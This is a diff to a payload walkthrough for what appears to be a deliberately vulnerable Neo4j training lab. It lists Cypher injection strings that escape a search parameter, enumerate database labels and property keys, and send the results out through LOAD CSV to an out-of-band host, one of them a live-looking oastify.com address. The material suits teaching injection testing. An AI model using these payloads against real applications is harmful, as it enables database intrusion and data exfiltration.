RJColeman/dvnosqli/PAYLOADS.md

 You need [Burp Collaborator](https://portswigger.net/burp/documentation/desktop/tools/collaborator-client), which is sadly only available with Burpsuite Pro, or your own webserver where you are able to see HTTP access requests.
 You could add a basic webserver container to this set up and use that server's IP address and access logs in place of Burp Collaborator.

 1. Set your challenge level to Medium
+2. Get list of all labels in the database and look for something interesting

 ```
 person=Christian+Bale"+CALL+db.labels()+YIELD+label+LOAD+CSV+FROM+'https://tebgn3hmme2rnqefb660xa8raig84x.oastify.com/'%2blabel+AS+r+return+person//&search=go
 person=Christian+Bale"+CALL+db.labels()+YIELD+label+LOAD+CSV+FROM+'https://your.burpcollaboratorurl.com/'%2bpropertyKey+AS+r+return+person//&search=go
 ```

-2. Get list of all properties in the database and look for something interesting
+3. Get list of all properties in the database and look for something interesting

 ```
 person=Christian+Bale"+CALL+db.propertyKeys()+YIELD+propertyKey+LOAD+CSV+from+'https://tebgn3hmme2rnqefb660xa8raig84x.oastify.com/'%2bpropertyKey+AS+r+return+person//&search=go
 person=Christian+Bale"+CALL+db.propertyKeys()+YIELD+propertyKey+LOAD+CSV+from+'https://your.burpcollaboratorurl.com/'%2bpropertyKey+AS+r+return+person//&search=go
 ```

-3. Try variations of the following payload, replacing LABEL with an actual label and PROPERTY with an actual property from steps 1 & 2.
+4. Try variations of the following payload, replacing LABEL with an actual label and PROPERTY with an actual property from steps 1 & 2.
 This will tell you what properties go with what labels - if no error is thrown you have a property matched to a label.

 ```
 person=Christian+Bale"})-[role]->(node:LABEL)+RETURN+person,role,node.PROPERTY&role=DIRECTED&search=go